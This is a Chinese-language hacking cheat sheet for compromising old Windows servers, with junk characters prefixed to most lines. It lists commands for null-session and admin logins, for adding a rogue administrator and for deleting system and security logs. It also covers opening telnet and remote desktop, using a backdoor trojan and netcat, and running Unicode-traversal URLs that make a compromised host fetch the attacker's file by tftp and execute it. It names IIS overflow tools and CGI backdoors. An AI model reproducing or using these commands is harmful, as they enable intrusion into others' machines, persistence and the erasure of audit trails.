网管和黑客都必须知道的命令
;C/bJEgdd 常用的几条NET命令:
o:dR5v 5;TuVU.8Q (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
+1Ph<zq" 7j i=E";.w (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
m:O(+Fl FM5e+$>@ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
Pe~`16f 0i8hI6d (查看远程主机时间) net time \\IP地址
$O:w(U )W&>[B (定时启动某个程序) at \\IP地址 02:18 readme.exe
A?"h@-~2 HT_TP q (查看共享) net view \\IP地址
8Chu"PM%-J %YlTF\- (查看netbios工作组列表) nbtstat -A IP地址
agOk*wH5 i"^<CR@e (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
>1irSUj"~ <B&R6<]T (这两条把自己增加到管理员组): net user 用户名 密码 /add
2$zU&p7sV "n\%_'R\hH net localgroup Administrators 用户名 /add
Cw,D{ w3D]~&] (断开连接) net use \\IP地址\ipc$ /delete
PI?j_8 8xI`jE"1 扫尾:
EkKnUD r<L#q)] del C:\winnt\system32\logfiles\*.*
8<)$z?K (%Oe_*e}Y del C:\winnt\ssytem32\config\*.evt
)3muPMaY C@HD(..# del C:\winnt\system32\dtclog\*.*
af+}S9To Dd2Lx&9 del C:\winnt\system32\*.log
5>ST"l_ca ij&p4 del C:\winnt\system32\*.txt
dTD5(}+J ~j,TVY del C:\winnt\*.txt
]?9[l76O7 ? Ekq6uz\) del C:\winnt\*.log
bEr.nF 0B0G2t&hr 一、netsvc.exe
3BMS_,P /?zW<QUI 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
(@ea|Fd#4 hZNEv| netsvc /list \\IP地址
J35l7HH yCM{M netsvc schedule \\IP地址 /query
'=TTa >7>7/7=O netsvc \\IP地址 schedule /start
Xn7[n }g,X5v?W 二、OpenTelnet.exe
;x>;jS.t ":&|[9/ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
iAQvsE ,e ELRzjl OpenTelnet \\IP地址 用户名 密码 1 7878
FH n,]Tfx (
ji_o^ 然后就可以telnet到主机的7878端口,进入DOS方式下:
pa]
TeH `QCD$= telnet IP地址 7878
f0F#Yi{fw Z oTNm 三、winshell.exe
Kpu<rKP` oBUh]sR{. 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
O`[]xs Hz4uZ*7\| p Path (查看winshell主程序的路径信息)
$T)d!$ !\w\ ]7ls b reBoot (重新启动机器)
`Wwh`]#"~d $PfV<Yj'B d shutDown (关闭机器)
OX,F09.C j];1"50? s Shell (执行后你就会看到可爱的“C:\>”)
bf^ly6ml
I;iR(Hf)?q x eXit (退出本次登录会话,此命令并不终止winshell的运行)
fbL!=]A*3 ]EX--d<_` CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
s#Q_Gu wG6FS 四、3389登陆器,GUI方式登录远程主机的
&x/k^p= ks^|> 五、elsave.exe
&@oq~j_7 @{de$ODu 事件日志清除工具
Pu/lpHm| 1(F'~i|5 elsave -s \\IP地址 -l "application" -C
7#/|VQX<A wO\!xW: elsave -s \\IP地址 -l "system" -C
{G]`1Q1DR 8ok7|DJ elsave -s \\IP地址 -l "security" -C
Kk56/(_S a:xgjUt&5 执行后成功清除应用程序日志,系统日志,安全日志
z7$}#)Z7 GfQ^@Tl 六、hbulot.exe
Suj}MEiv )muv;Rf`e5 开启win2kserver和winxp的3389服务
ma`w\8a t;~-_{ hbulot [/r]
/T4VJ{D |<7i|J 使用/r表示安装完成后自动重起目标使设置生效。
zh
hGqz[K j!"iYtgV 七、nc.exe(netcat.exe)
G:){^Z? %!W6<ioW 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
I[a%a!QO 3Y=,r!F.h 想要连接到某处: nc [-options] hostname port[s] [ports] ...
IFkvv1S` &?fvt
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
2@OBeR jm~mhAE# 参数:
@b>YkJDk ?\l!]vu* -e prog 程序重定向,一旦连接,就执行 [危险!!]
Z@8MhJ ENpaaW@!Y -g gateway source-routing hop point[s], up to 8
sL;z"N@PK +EQpD. -G num source-routing pointer: 4, 8, 12, ...
8p3ZF@c~t k^~@9F5k -h 帮助信息
6qY\7R2+ D'Jm!Ap -i secs 延时的间隔
H{&a)!Ms U=_~{[/ -l 监听模式,用于入站连接
QGu7D #%| c4S>_qH -n 指定数字的IP地址,不能用hostname
#xD&z^o [+Yl;3&] -o file 记录16进制的传输
8-W"4)@b ?T$*5d -p port 本地端口号
vEX|Q\b6' pXGK:ceFu -r 任意指定本地及远程端口
ze-TBh/ ~t1O]aO( -s addr 本地源地址
>}xAg7\^ A?^A*e -u UDP模式
o9DYr[ f]{1ZU%4 -v 详细输出——用两个-v可得到更详细的内容
Xq} n^W 1 P(&GYc -w secs timeout的时间
- I1cAt g]oc(RM -z 将输入输出关掉——用于扫描时
d;*OO xQV 八、TFTPD32.EXE
#VP-T; Ahe U4
go8 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
.If"'hMY ui0J}DM http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
^59YfC<f "^e}C@ 然后可以直接令文件运行:
%B*<BgJ;4F /*mFP.en http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
GgZEg
?@ 4w?]dDyc% 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
E.WNykF-
$\JQGic` 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
Wme1Uid k:(e79 一、一 Xscan命令行运行参数说明:
~(*co[_ Q8M:7#ySji 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
F|h,a;2 S>vVjq?~l( 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
l>[QrRXiSN etQx>U xscan -file <主机列表文件名> <检测项目> [其他选项]
TV[6+i*# wXIe5 其中<检测项目> 含义如下:
%Hl:nT2M Occ8Hk/l. -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
H *z0xxa v3VLvh2)n -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
0qotC6l~_w ,]>`guDV -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
X,C/x) <*~BG)b -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
1z$}*` L`VQ{|&3V -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
B[U.CAUn X&;] [其他选项] 含义如下:
jP6oJcZ v2W"+QS}u -v: 显示详细扫描进度
}GU6Q|s[u[ ;?Y`e -p: 跳过Ping不通的主机
9<0$mE^: 19YJ`(L`x -o: 跳过没有检测到开放端口的主机
Xj@
07G*M ] -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10